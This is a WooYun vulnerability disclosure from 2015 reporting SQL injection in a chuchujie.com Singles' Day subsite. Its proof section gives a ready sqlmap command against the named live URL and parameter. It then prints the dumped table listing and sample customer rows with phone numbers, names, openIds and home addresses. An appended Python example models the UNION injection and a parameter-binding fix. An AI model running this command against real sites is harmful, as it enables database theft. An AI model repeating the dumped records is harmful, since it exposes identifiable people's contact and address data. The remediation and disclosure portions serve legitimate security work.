
Vulnerability Summary (24 followers)

Defect ID: wooyun-2015-0153270

Title: SQL injection in a chuchujie subsite (buy pretty, but buy safely)

Vendor: chuchujie.com

Author: 猪猪侠

Submitted: 2015-11-10 12:36

Fixed/closed: 2015-11-23 09:30

Made public: 2015-11-23 09:30

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor was notified but ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2015-11-10: details sent to the vendor, awaiting vendor response
2015-11-23: vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Singles' Day (11/11): have your shopping spree, but have it safely.
A chuchujie subsite has a SQL injection vulnerability (buy pretty, but buy safely).
It exposes more than ten million order records and several million user records.

Detailed description:

#1 Injection URL

http://huodong.chuchujie.com:80/20151111/ajax.php?category1=3&action=fgetGoods
Injectable parameter: category1

Proof of vulnerability:

#Proof

python sqlmap.py -u "http://huodong.chuchujie.com:80/20151111/ajax.php?category1=3&action=fgetGoods" -D huodong -T inviteOrders --dump --start 1 --stop 5


Database: huodong
+--------------------------+----------+
| Table                    | Entries  |
+--------------------------+----------+
| inviteOrders             | 10922341 |
| zlUserinfo3              | 7929815  |
| inviteUser               | 7467237  |
| sso_openid               | 4531859  |
| zlUserinfo4              | 3608880  |
| digAlert                 | 3415202  |
| digUser201508            | 1975330  |
| digUser                  | 1953446  |
| digUser201509            | 1626351  |
| digUser201504            | 1575203  |
| digUser201507            | 1465415  |
| digUserGift              | 1418846  |
| digUser201510            | 1329393  |
| digUser201506            | 1325872  |
| zlComment5               | 1066662  |
| digUser201505            | 967930   |
| zlComment12              | 680894   |
| digUserWish              | 559441   |
| rp_getuser               | 536124   |
| springUser               | 515823   |
+--------------------------+----------+


Database: huodong
Table: zlUserinfo3
[5 entries]
+----+--------+----------+-------------+-----------------------------------------+------------+
| id | itemid | userId   | userTel     | awardCode                               | created_on |
+----+--------+----------+-------------+-----------------------------------------+------------+
| 1  | 149    | 23838667 | 13413191722 | CC0000001,CC0000014,CC0000015,CC0000016 | 20150827   |
| 2  | 149    | 11775670 | 13938139707 | CC0000002,CC0000569,CC0000570,CC0000571 | 20150827   |
| 3  | 149    | 22771867 | 15139134935 | CC0000003,CC0000026,CC0000027,CC0000028 | 20150827   |
| 4  | 149    | 24953981 | 18316113437 | CC0000004,CC0000367,CC0000368,CC0000369 | 20150827   |
| 5  | 149    | 6822479  | 13333222660 | CC0000005,CC0000299,CC0000300,CC0000301 | 20150827   |
+----+--------+----------+-------------+-----------------------------------------+------------+


Database: huodong
Table: inviteOrders
[5 entries]
+----+-------+---------+------------------------------+-----------+--------+------------+---------+-------------+----------+-------------+---------------------+---------+----------------------------+
| id | cid   | skuId   | openId                       | areaId    | shopId | productId  | orderSN | userTel     | userName | userArea    | createdOn           | version | userAddress                |
+----+-------+---------+------------------------------+-----------+--------+------------+---------+-------------+----------+-------------+---------------------+---------+----------------------------+
| 1  | 11281 | 9250445 | oioKYtyPvFefOgsJy5rX0KSF-b8c | 101001005 | 4063   | 1000406353 | <blank> | 13718304689 | 测试马艳琴    | 北京市,北京市,朝阳区 | 2015-05-18 13:13:05 | 16      | 北京市朝阳区霄云路28号院网信大厦2号楼6层     |
| 3  | 11281 | 2514131 | oioKYt17Cj7d8abZTB3-60Q3bhEo | 117010006 | 1219   | 1000121919 | <blank> | 15801421563 | 小倩测试     | 河南省,商丘市,民权县 | 2015-05-18 13:48:46 | 21      | 河南省商丘市民权县绿洲超市附近            |
| 4  | 11281 | 6141583 | oioKYtxQzv2Bo7UxugkBPI5FBxtU | 101001010 | 2766   | 1000276611 | <blank> | 18510157865 | 李亚品      | 北京市,北京市,房山区 | 2015-05-18 14:18:00 | 4       | 良乡镇大学城西鸿顺园西区12号楼2单元501     |
| 6  | 11281 | 5040174 | oioKYtzFn1zsRswMZbrwcjjt9ka8 | 101001008 | 4857   | 100048571  | <blank> | 18611544505 | 项秋媛      | 北京市,北京市,海淀区 | 2015-05-18 14:51:38 | 24      | 丰慧中路7号新材料大厦11层             |
| 7  | 11281 | 5131414 | oioKYt4IJwMn6JFZ-UmFMdA5GKOU | 101001008 | 2250   | 1000225046 | <blank> | 18911471706 | 朱加保      | 北京市,北京市,海淀区 | 2015-05-18 15:08:20 | 3       | 北京市海淀区中关村东路123号都市网景3号口2003 |
+----+-------+---------+------------------------------+-----------+--------+------------+---------+-------------+----------+-------------+---------------------+---------+----------------------------+

Fix:

Filter the input: validate category1 server-side as an integer (it is a category id and nothing else) and pass it to the database as a bound query parameter instead of splicing it into the SQL string.
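The defect and the fix side by side, as an added example that is not the site's own code (ajax.php is PHP and its source is not on the page): a Python/sqlite3 model of an assumed fgetGoods handler that concatenates category1 into its query, a UNION payload of the kind sqlmap's union technique uses to pull rows from an unrelated table, and a hardened handler that allow-lists the value as a decimal integer and binds it. Table names echo the dump above, but every row is constructed sample data.

```python
import re
import sqlite3

# Constructed sample schema and rows modelling the huodong database. The
# table names echo the report; the data is made up, not the dumped records.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE goods (id INTEGER, category1 INTEGER, name TEXT);
        CREATE TABLE zlUserinfo3 (id INTEGER, userId INTEGER, userTel TEXT, awardCode TEXT);
        INSERT INTO goods VALUES (1, 3, 'scarf');
        INSERT INTO goods VALUES (2, 3, 'coat');
        INSERT INTO goods VALUES (3, 5, 'boots');
        INSERT INTO zlUserinfo3 VALUES (1, 1001, '13800000001', 'CC0000001');
        INSERT INTO zlUserinfo3 VALUES (2, 1002, '13800000002', 'CC0000002');
        """
    )
    return conn


def fget_goods_vulnerable(conn: sqlite3.Connection, category1: str) -> list:
    """Assumed shape of the bug: the query-string value is spliced into the
    SQL text, so "3 UNION ALL SELECT ..." reaches the engine as SQL."""
    sql = f"SELECT id, name FROM goods WHERE category1 = {category1}"
    return conn.execute(sql).fetchall()


def fget_goods_fixed(conn: sqlite3.Connection, category1: str) -> list:
    """Hardened form: allow-list the value as a short decimal integer, then
    bind it as a parameter so it is never parsed as SQL."""
    if not re.fullmatch(r"[0-9]{1,10}", category1):
        raise ValueError("category1 must be a decimal integer")
    sql = "SELECT id, name FROM goods WHERE category1 = ?"
    return conn.execute(sql, (int(category1),)).fetchall()


# Union payload: the goods query selects two columns, so the injected SELECT
# must also return two for the union to be accepted.
UNION_PAYLOAD = "3 UNION ALL SELECT userId, userTel FROM zlUserinfo3"


def leaked_rows(conn: sqlite3.Connection) -> list:
    """Rows the vulnerable handler returns that do not come from goods."""
    goods = set(conn.execute("SELECT id, name FROM goods").fetchall())
    return [r for r in fget_goods_vulnerable(conn, UNION_PAYLOAD) if r not in goods]


def payload_rejected(conn: sqlite3.Connection, value: str) -> bool:
    """True when the hardened handler refuses the value before querying."""
    try:
        fget_goods_fixed(conn, value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", fget_goods_vulnerable(db, UNION_PAYLOAD))
    print("leaked:", leaked_rows(db))
    print("fixed, benign input:", fget_goods_fixed(db, "3"))
    print("fixed, payload rejected:", payload_rejected(db, UNION_PAYLOAD))
```

The allow-list is deliberately stricter than "escape the quotes": category1 is compared as a number, so the injection needs no quote character at all, and a quote-escaping filter would not have stopped it. Binding alone would also close the hole; the regex is defence in depth that rejects junk before it reaches the database.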

Copyright notice: when reposting, credit the source: 猪猪侠@乌云


Vulnerability Response

Vendor response:

Severity: no impact (vendor ignored)

Ignored at: 2015-11-23 09:30

Vendor reply:

Vulnerability Rank: 15 (WooYun assessment)

Latest status:

None